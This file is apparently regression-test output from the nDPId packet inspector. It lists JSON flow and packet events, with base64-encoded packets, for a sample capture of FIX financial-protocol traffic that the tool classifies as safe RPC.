00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"}
00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
